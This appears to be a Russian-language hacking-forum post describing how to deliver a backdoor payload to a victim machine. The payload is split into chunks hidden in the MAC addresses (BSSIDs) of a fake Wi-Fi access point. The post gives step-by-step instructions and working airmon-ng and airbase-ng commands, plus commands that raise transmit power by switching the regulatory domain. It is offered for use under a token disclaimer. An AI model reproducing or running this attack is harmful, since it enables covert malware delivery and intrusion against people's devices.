Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Привет, хакеры!

Сегодня я расскажу о способе заражения жертвы вирусом через сеть Wi-Fi.

Итак, у нас есть в наличии backdoor payload. Не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения.

В данной схеме мы проводим атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.

На заметку:

Вы можете использовать MANA-Toolkit: https://github.com/sensepost/mana.

Допустим у нас есть пейлоад “fec8b00011ddc00945f1”.
Что же нам необходимо делать далее?

Шаг 1

Нам необходимо создать фейковую точку доступа, которую мы назовём "Фейк" (что бы вам было понятнее) и мак адрес, у неё будет 00:fe:c8:b0:00:11

  • Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1
  • Это секция пейлоада “fec8b00011ddc00945f1

Шаг 2

Система с беком сканит ESSID нашего фейка и дампит BSSID для неё.

  • Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011

Шаг 3

Атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1

  • Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”
  • Это секция пейлоада “fec8b00011ddc00945f1”

Шаг 4

Система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1

После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP:

ifconfig wlan0 down

iw reg set BO

ifconfig wlan0 up

iwconfig wlan0 txpower 30

С помощью этих команд мы увеличиваем мощность нашей AP.

Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.

Далее пойдут команды с кратким описанием:

airmon-ng start wlan0 - запускаем интерфейс;

airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада;

sleep 15 - дайте точке поспать 15 секунд;

killall airbase-ng - если у точки бессонница;

airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада;

sleep 15 - дайте точке поспать 15 секунд;

killall airbase-ng - если у точки бессонница.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.